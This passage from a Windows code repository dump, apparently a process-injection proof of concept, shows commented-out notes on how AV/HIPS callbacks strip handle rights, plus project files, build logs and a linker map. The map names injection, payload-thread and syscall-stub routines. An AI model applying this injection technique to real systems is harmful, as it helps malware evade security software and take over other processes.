useDebugPrivilege flag when opening a cross session process 550 | //// ///or if we tried to open an elevated process while running non-elevated. 
551 | 552 | //// ///In x64 windows, HIPS or AV drivers have the possibility to legally 553 | //// ///receive a notification if a process is about to open a handle to another process. 554 | //// ///In those ObCallback routines they cannot completely deny the opening. 555 | //// ///However, they are able to modify the access masks, so a handle supposed for VM operations still 556 | //// ///will be lacking the PROCESS_VM_XXX rights, for example. If we therefore query the handle rights 557 | //// ///we can still return an appropriate error if wasn't granted the rights we want 558 | //// ///And are not going to fail at first when performing our process operations. 559 | 560 | 561 | ///////Maybe, HIPS just wanted to deny PROCESS_TERMINATE/PROCESS_SUSPEND right? 562 | ///////If so, we don't care. We're only interested in VM rights. 563 | ////if (MIN_VM_ACCESS_MASK & ~processHandleInfo.GrantedAccess) { 564 | //// NtClose(*pProcess); 565 | //// *pProcess = NULL; 566 | //// return STATUS_UNSUCCESSFUL; 567 | ////} 568 | 569 | /////...and demonstrate that we have hopefully succeeded. 
570 | ////status = testNtapiTable(); 571 | ////if (status) 572 | //// dispError(status); 573 | } 574 | 575 | //void testRoutine(void) { 576 | // ULONG_PTR dummyVar; 577 | // &dummyVar; 578 | //} -------------------------------------------------------------------------------- /rtsectiontest/rtsectiontest.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Release 6 | x64 7 | 8 | 9 | 10 | {16086A51-3A9D-41EF-B34B-1382E6EE808D} 11 | rtsectiontest 12 | 10.0.10240.0 13 | 14 | 15 | 16 | Application 17 | false 18 | v140 19 | true 20 | Unicode 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | false 33 | false 34 | $(ProjectDir);$(IncludePath) 35 | BuildLink 36 | Compile 37 | 38 | 39 | 40 | Level4 41 | MinSpace 42 | true 43 | true 44 | 45 | 46 | None 47 | false 48 | Disabled 49 | Size 50 | true 51 | false 52 | MultiThreadedDebugDLL 53 | false 54 | Fast 55 | false 56 | false 57 | false 58 | StdCall 59 | CompileAsC 60 | true 61 | _UNICODE;UNICODE;_WIN64;_AMD64_;AMD64;%(PreprocessorDefinitions) 62 | 63 | 64 | Debug 65 | true 66 | true 67 | $(ProjectDir)Libraries\myntdll.bin 68 | true 69 | true 70 | mymain 71 | false 72 | false 73 | 6.1 74 | Windows 75 | UseLinkTimeCodeGeneration 76 | 77 | 78 | true 79 | 80 | 81 | false 82 | 83 | 84 | ml64 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | true 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | Document 109 | 110 | 111 | 112 | 113 | 114 | 115 | -------------------------------------------------------------------------------- /rtsectiontest/rtsectiontest.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {f3f02b50-269a-49a1-aeae-d35a0a3581ea} 14 | 15 | 16 | 17 | 18 | Header Files 19 | 20 
| 21 | Header Files 22 | 23 | 24 | 25 | 26 | Source Files 27 | 28 | 29 | 30 | 31 | Libraries 32 | 33 | 34 | 35 | 36 | Source Files 37 | 38 | 39 | -------------------------------------------------------------------------------- /rtsectiontest/rtsectiontest.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | false 5 | 6 | -------------------------------------------------------------------------------- /rtsectiontest/x64/Release/auxfuncs.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Microwave89/rtsectiontest/fe36fd2403c69db6d9024f95282fc9d2a60caa2d/rtsectiontest/x64/Release/auxfuncs.obj -------------------------------------------------------------------------------- /rtsectiontest/x64/Release/main.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Microwave89/rtsectiontest/fe36fd2403c69db6d9024f95282fc9d2a60caa2d/rtsectiontest/x64/Release/main.obj -------------------------------------------------------------------------------- /rtsectiontest/x64/Release/rtsectiontest.Build.CppClean.log: -------------------------------------------------------------------------------- 1 | c:\users\microwavestd\documents\visual studio 2015\projects\um\rtsectiontest\rtsectiontest\x64\release\main.obj 2 | c:\users\microwavestd\documents\visual studio 2015\projects\um\rtsectiontest\x64\release\rtsectiontest.exe 3 | c:\users\microwavestd\documents\visual studio 2015\projects\um\rtsectiontest\x64\release\rtsectiontest.map 4 | c:\users\microwavestd\documents\visual studio 2015\projects\um\rtsectiontest\x64\release\rtsectiontest.pdb 5 | c:\users\microwavestd\documents\visual studio 2015\projects\um\rtsectiontest\rtsectiontest\x64\release\auxfuncs.obj 6 | c:\users\microwavestd\documents\visual studio 2015\projects\um\rtsectiontest\rtsectiontest\x64\release\rtsectiontest.tlog\cl.command.1.tlog 7 | 
c:\users\microwavestd\documents\visual studio 2015\projects\um\rtsectiontest\rtsectiontest\x64\release\rtsectiontest.tlog\cl.read.1.tlog 8 | c:\users\microwavestd\documents\visual studio 2015\projects\um\rtsectiontest\rtsectiontest\x64\release\rtsectiontest.tlog\cl.write.1.tlog 9 | c:\users\microwavestd\documents\visual studio 2015\projects\um\rtsectiontest\rtsectiontest\x64\release\rtsectiontest.tlog\link.command.1.tlog 10 | c:\users\microwavestd\documents\visual studio 2015\projects\um\rtsectiontest\rtsectiontest\x64\release\rtsectiontest.tlog\link.read.1.tlog 11 | c:\users\microwavestd\documents\visual studio 2015\projects\um\rtsectiontest\rtsectiontest\x64\release\rtsectiontest.tlog\link.write.1.tlog 12 | c:\users\microwavestd\documents\visual studio 2015\projects\um\rtsectiontest\rtsectiontest\x64\release\rtsectiontest.tlog\rtsectiontest.write.1u.tlog 13 | -------------------------------------------------------------------------------- /rtsectiontest/x64/Release/rtsectiontest.log: -------------------------------------------------------------------------------- 1 | Build started 26.10.2015 04:32:15. 2 | 1>Project "C:\Users\MicrowaveStd\Documents\Visual Studio 2015\Projects\um\rtsectiontest\rtsectiontest\rtsectiontest.vcxproj" on node 2 (Rebuild target(s)). 3 | 1>_MASM: 4 | Assembling auxfuncs.asm... 
5 | cmd.exe /C "C:\Users\MicrowaveStd\AppData\Local\Temp\tmpee9f7f8c528b4447b7324d0ebdc7dc6c.cmd" 6 | ml64.exe /c /nologo /Zf /Zi /Fo"x64\Release\auxfuncs.obj" /W3 /errorReport:prompt /Taauxfuncs.asm 7 | ClCompile: 8 | C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\bin\x86_amd64\CL.exe /c /nologo /W4 /WX- /O1 /Ob0 /Oi /Os /Oy /GL /D _UNICODE /D UNICODE /D _WIN64 /D _AMD64_ /D AMD64 /D _UNICODE /D UNICODE /Gm- /MDd /GS- /Gy /fp:fast /fp:except- /Zc:wchar_t /Zc:forScope /Zc:inline /GR- /Fo"x64\Release\\" /Fd"x64\Release\vc140.pdb" /Gz /TC /Zl /errorReport:prompt main.c 9 | main.c 10 | 1>main.c(225): warning C4054: 'type cast': from function pointer 'NTSTATUS (__cdecl *)(PHANDLE,ACCESS_MASK,POBJECT_ATTRIBUTES,HANDLE,PTHREAD_START_ROUTINE,PVOID,BOOLEAN,ULONG_PTR,SIZE_T,SIZE_T,PVOID)' to data pointer 'PNT_SYSCALL_STUB' 11 | 1>main.c(226): warning C4054: 'type cast': from function pointer 'NTSTATUS (__cdecl *)(HANDLE,PVOID *,SIZE_T *,ULONG,PULONG)' to data pointer 'PNT_SYSCALL_STUB' 12 | Link: 13 | C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\bin\x86_amd64\link.exe /ERRORREPORT:PROMPT /OUT:"C:\Users\MicrowaveStd\Documents\Visual Studio 2015\Projects\um\rtsectiontest\x64\Release\rtsectiontest.exe" /VERSION:"6.1" /INCREMENTAL:NO /NOLOGO "C:\Users\MicrowaveStd\Documents\Visual Studio 2015\Projects\um\rtsectiontest\rtsectiontest\Libraries\myntdll.bin" /NODEFAULTLIB /MANIFEST:NO /DEBUG /PDB:"C:\Users\MicrowaveStd\Documents\Visual Studio 2015\Projects\um\rtsectiontest\x64\Release\rtsectiontest.pdb" /MAP /SUBSYSTEM:WINDOWS /LARGEADDRESSAWARE /OPT:REF /OPT:ICF /LTCG /TLBID:1 /ENTRY:"mymain" /DYNAMICBASE /FIXED:NO /NXCOMPAT /IMPLIB:"C:\Users\MicrowaveStd\Documents\Visual Studio 2015\Projects\um\rtsectiontest\x64\Release\rtsectiontest.lib" /MACHINE:X64 /SAFESEH:NO x64\Release\main.obj 14 | x64\Release\auxfuncs.obj 15 | Generating code 16 | Finished generating code 17 | rtsectiontest.vcxproj -> C:\Users\MicrowaveStd\Documents\Visual Studio 
2015\Projects\um\rtsectiontest\x64\Release\rtsectiontest.exe 18 | 1>Done Building Project "C:\Users\MicrowaveStd\Documents\Visual Studio 2015\Projects\um\rtsectiontest\rtsectiontest\rtsectiontest.vcxproj" (Rebuild target(s)). 19 | 20 | Build succeeded. 21 | 22 | Time Elapsed 00:00:02.71 23 | -------------------------------------------------------------------------------- /rtsectiontest/x64/Release/rtsectiontest.tlog/CL.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Microwave89/rtsectiontest/fe36fd2403c69db6d9024f95282fc9d2a60caa2d/rtsectiontest/x64/Release/rtsectiontest.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /rtsectiontest/x64/Release/rtsectiontest.tlog/CL.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Microwave89/rtsectiontest/fe36fd2403c69db6d9024f95282fc9d2a60caa2d/rtsectiontest/x64/Release/rtsectiontest.tlog/CL.read.1.tlog -------------------------------------------------------------------------------- /rtsectiontest/x64/Release/rtsectiontest.tlog/CL.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Microwave89/rtsectiontest/fe36fd2403c69db6d9024f95282fc9d2a60caa2d/rtsectiontest/x64/Release/rtsectiontest.tlog/CL.write.1.tlog -------------------------------------------------------------------------------- /rtsectiontest/x64/Release/rtsectiontest.tlog/link.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Microwave89/rtsectiontest/fe36fd2403c69db6d9024f95282fc9d2a60caa2d/rtsectiontest/x64/Release/rtsectiontest.tlog/link.command.1.tlog -------------------------------------------------------------------------------- /rtsectiontest/x64/Release/rtsectiontest.tlog/link.read.1.tlog: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/Microwave89/rtsectiontest/fe36fd2403c69db6d9024f95282fc9d2a60caa2d/rtsectiontest/x64/Release/rtsectiontest.tlog/link.read.1.tlog -------------------------------------------------------------------------------- /rtsectiontest/x64/Release/rtsectiontest.tlog/link.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Microwave89/rtsectiontest/fe36fd2403c69db6d9024f95282fc9d2a60caa2d/rtsectiontest/x64/Release/rtsectiontest.tlog/link.write.1.tlog -------------------------------------------------------------------------------- /rtsectiontest/x64/Release/rtsectiontest.tlog/rtsectiontest.lastbuildstate: -------------------------------------------------------------------------------- 1 | #TargetFrameworkVersion=v4.0:PlatformToolSet=v140:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit 2 | Release|x64|C:\Users\MicrowaveStd\Documents\Visual Studio 2015\Projects\um\rtsectiontest\| 3 | -------------------------------------------------------------------------------- /rtsectiontest/x64/Release/rtsectiontest.tlog/rtsectiontest.write.1u.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Microwave89/rtsectiontest/fe36fd2403c69db6d9024f95282fc9d2a60caa2d/rtsectiontest/x64/Release/rtsectiontest.tlog/rtsectiontest.write.1u.tlog -------------------------------------------------------------------------------- /x64/Release/rtsectiontest.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Microwave89/rtsectiontest/fe36fd2403c69db6d9024f95282fc9d2a60caa2d/x64/Release/rtsectiontest.exe -------------------------------------------------------------------------------- /x64/Release/rtsectiontest.map: 
-------------------------------------------------------------------------------- 1 | rtsectiontest 2 | 3 | Timestamp is 562d9ec2 (Mon Oct 26 04:32:18 2015) 4 | 5 | Preferred load address is 0000000140000000 6 | 7 | Start Length Name Class 8 | 0001:00000000 000008f7H .text$mn CODE 9 | 0002:00000000 000000b8H .idata$5 DATA 10 | 0002:000000c0 00000074H .rdata DATA 11 | 0002:00000134 0000017cH .rdata$zzzdbg DATA 12 | 0002:000002b0 0000005cH .xdata DATA 13 | 0002:0000030c 00000000H .edata DATA 14 | 0002:0000030c 00000014H .idata$2 DATA 15 | 0002:00000320 00000014H .idata$3 DATA 16 | 0002:00000338 000000b8H .idata$4 DATA 17 | 0002:000003f0 00000200H .idata$6 DATA 18 | 0003:00000000 000001b2H .data DATA 19 | 0003:000001c0 00000c10H .bss DATA 20 | 0004:00000000 0000003cH .pdata DATA 21 | 22 | Address Publics by Value Rva+Base Lib:Object 23 | 24 | 0000:00000000 __guard_flags 0000000000000000 25 | 0000:00000000 __guard_fids_count 0000000000000000 26 | 0000:00000000 __guard_fids_table 0000000000000000 27 | 0001:00000000 NtCurrentTeb 0000000140001000 f i main.obj 28 | 0001:0000000c dispError 000000014000100c f main.obj 29 | 0001:0000003c openWorkerFactory 000000014000103c f main.obj 30 | 0001:0000032c injectIntoProcess 000000014000132c f main.obj 31 | 0001:000005fc openProcsByName 00000001400015fc f main.obj 32 | 0001:00000898 mymain 0000000140001898 f main.obj 33 | 0001:000008e0 mymemcmp 00000001400018e0 f auxfuncs.obj 34 | 0002:00000000 __imp_LdrInitializeThunk 0000000140002000 myntdll:ntdll.dll 35 | 0002:00000008 __imp_RtlCompareUnicodeString 0000000140002008 myntdll:ntdll.dll 36 | 0002:00000010 __imp_NtFreeVirtualMemory 0000000140002010 myntdll:ntdll.dll 37 | 0002:00000018 __imp_NtQuerySystemInformation 0000000140002018 myntdll:ntdll.dll 38 | 0002:00000020 __imp_NtQueryInformationWorkerFactory 0000000140002020 myntdll:ntdll.dll 39 | 0002:00000028 __imp_NtCreateThreadEx 0000000140002028 myntdll:ntdll.dll 40 | 0002:00000030 __imp_NtOpenProcess 0000000140002030 
myntdll:ntdll.dll 41 | 0002:00000038 __imp_NtResumeProcess 0000000140002038 myntdll:ntdll.dll 42 | 0002:00000040 __imp_NtAllocateVirtualMemory 0000000140002040 myntdll:ntdll.dll 43 | 0002:00000048 __imp_NtWaitForWorkViaWorkerFactory 0000000140002048 myntdll:ntdll.dll 44 | 0002:00000050 __imp_NtCreateIoCompletion 0000000140002050 myntdll:ntdll.dll 45 | 0002:00000058 __imp_NtDelayExecution 0000000140002058 myntdll:ntdll.dll 46 | 0002:00000060 __imp_NtRaiseHardError 0000000140002060 myntdll:ntdll.dll 47 | 0002:00000068 __imp_NtReadVirtualMemory 0000000140002068 myntdll:ntdll.dll 48 | 0002:00000070 __imp_NtClose 0000000140002070 myntdll:ntdll.dll 49 | 0002:00000078 __imp_NtDuplicateObject 0000000140002078 myntdll:ntdll.dll 50 | 0002:00000080 __imp_NtProtectVirtualMemory 0000000140002080 myntdll:ntdll.dll 51 | 0002:00000088 __imp_NtCreateWorkerFactory 0000000140002088 myntdll:ntdll.dll 52 | 0002:00000090 __imp_NtWriteVirtualMemory 0000000140002090 myntdll:ntdll.dll 53 | 0002:00000098 __imp_NtQueryObject 0000000140002098 myntdll:ntdll.dll 54 | 0002:000000a0 __imp_NtSetInformationWorkerFactory 00000001400020a0 myntdll:ntdll.dll 55 | 0002:000000a8 __imp_NtSuspendProcess 00000001400020a8 myntdll:ntdll.dll 56 | 0002:000000b0 \177ntdll_NULL_THUNK_DATA 00000001400020b0 myntdll:ntdll.dll 57 | 0002:000000c0 ??_C@_1BK@NBNJEGII@?$AAi?$AAe?$AAx?$AAp?$AAl?$AAo?$AAr?$AAe?$AA?4?$AAe?$AAx?$AAe?$AA?$AA@ 00000001400020c0 main.obj 58 | 0002:0000030c __IMPORT_DESCRIPTOR_ntdll 000000014000230c myntdll:ntdll.dll 59 | 0002:00000320 __NULL_IMPORT_DESCRIPTOR 0000000140002320 myntdll:ntdll.dll 60 | 0003:00000000 injectionCode 0000000140003000 f auxfuncs.obj 61 | 0003:00000005 bootstrapRoutineBegin 0000000140003005 f auxfuncs.obj 62 | 0003:00000016 originalSyscallCode 0000000140003016 f auxfuncs.obj 63 | 0003:0000005f syscallStub 000000014000305f f auxfuncs.obj 64 | 0003:0000007b createPayloadThreadBegin 000000014000307b f auxfuncs.obj 65 | 0003:0000007b fpCreatePayloadThread 000000014000307b f 
auxfuncs.obj 66 | 0003:000000e5 ntCreateThreadExNumber 00000001400030e5 f auxfuncs.obj 67 | 0003:000000f3 createPayloadThreadEnd 00000001400030f3 f auxfuncs.obj 68 | 0003:000000f3 ldrInitializeThunkAddr 00000001400030f3 f auxfuncs.obj 69 | 0003:000000fb ntdllRxBaseAddr 00000001400030fb f auxfuncs.obj 70 | 0003:00000103 protSize 0000000140003103 f auxfuncs.obj 71 | 0003:0000010b origProt 000000014000310b f auxfuncs.obj 72 | 0003:00000168 ntProtectVirtMemNumber 0000000140003168 f auxfuncs.obj 73 | 0003:00000182 bootstrapRoutineEnd 0000000140003182 f auxfuncs.obj 74 | 75 | entry point at 0001:00000898 76 | 77 | Static symbols 78 | 79 | 0000:ffffb000 .debug$S 0000000140000000 myntdll:ntdll.dll 80 | 0000:ffffb000 .debug$S 0000000140000000 myntdll:ntdll.dll 81 | 0000:ffffb000 .debug$S 0000000140000000 myntdll:ntdll.dll 82 | 0000:ffffb000 .debug$S 0000000140000000 myntdll:ntdll.dll 83 | 0000:ffffb000 .debug$S 0000000140000000 myntdll:ntdll.dll 84 | 0000:ffffb000 .debug$S 0000000140000000 myntdll:ntdll.dll 85 | 0000:ffffb000 .debug$S 0000000140000000 myntdll:ntdll.dll 86 | 0000:ffffb000 .debug$S 0000000140000000 myntdll:ntdll.dll 87 | 0000:ffffb000 .debug$S 0000000140000000 myntdll:ntdll.dll 88 | 0000:ffffb000 .debug$S 0000000140000000 myntdll:ntdll.dll 89 | 0000:ffffb000 .debug$S 0000000140000000 myntdll:ntdll.dll 90 | 0000:ffffb000 .debug$S 0000000140000000 myntdll:ntdll.dll 91 | 0000:ffffb000 .debug$S 0000000140000000 myntdll:ntdll.dll 92 | 0000:ffffb000 .debug$S 0000000140000000 myntdll:ntdll.dll 93 | 0000:ffffb000 .debug$S 0000000140000000 myntdll:ntdll.dll 94 | 0000:ffffb000 .debug$S 0000000140000000 myntdll:ntdll.dll 95 | 0000:ffffb000 .debug$S 0000000140000000 myntdll:ntdll.dll 96 | 0000:ffffb000 .debug$S 0000000140000000 myntdll:ntdll.dll 97 | 0000:ffffb000 .debug$S 0000000140000000 myntdll:ntdll.dll 98 | 0000:ffffb000 .debug$S 0000000140000000 myntdll:ntdll.dll 99 | 0000:ffffb000 .debug$S 0000000140000000 myntdll:ntdll.dll 100 | 0000:ffffb000 .debug$S 
0000000140000000 myntdll:ntdll.dll 101 | 0000:ffffb000 .debug$S 0000000140000000 myntdll:ntdll.dll 102 | 0001:000008e0 $$000000 00000001400018e0 auxfuncs.obj 103 | 0002:000002b0 $unwind$dispError 00000001400022b0 main.obj 104 | 0002:000002b8 $unwind$openWorkerFactory 00000001400022b8 main.obj 105 | 0002:000002d4 $unwind$injectIntoProcess 00000001400022d4 main.obj 106 | 0002:000002ec $unwind$openProcsByName 00000001400022ec main.obj 107 | 0002:00000304 $unwind$mymain 0000000140002304 main.obj 108 | 0002:000005e6 .idata$6 00000001400025e6 myntdll:ntdll.dll 109 | 0003:00000000 $$000000 0000000140003000 auxfuncs.obj 110 | 0003:0000010f originalLdrInitThunk 000000014000310f auxfuncs.obj 111 | 0003:00000188 ?szOutputKeyPath@?1??myWPrintf@@9@9 0000000140003188 main.obj 112 | 0003:000001c0 ?objIndex@?1??openWorkerFactory@@9@9 00000001400031c0 main.obj 113 | 0003:000001d0 pZeroBuf 00000001400031d0 main.obj 114 | 0004:00000000 $pdata$dispError 0000000140004000 main.obj 115 | 0004:0000000c $pdata$openWorkerFactory 000000014000400c main.obj 116 | 0004:00000018 $pdata$injectIntoProcess 0000000140004018 main.obj 117 | 0004:00000024 $pdata$openProcsByName 0000000140004024 main.obj 118 | 0004:00000030 $pdata$mymain 0000000140004030 main.obj 119 | -------------------------------------------------------------------------------- /x64/Release/rtsectiontest.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Microwave89/rtsectiontest/fe36fd2403c69db6d9024f95282fc9d2a60caa2d/x64/Release/rtsectiontest.pdb --------------------------------------------------------------------------------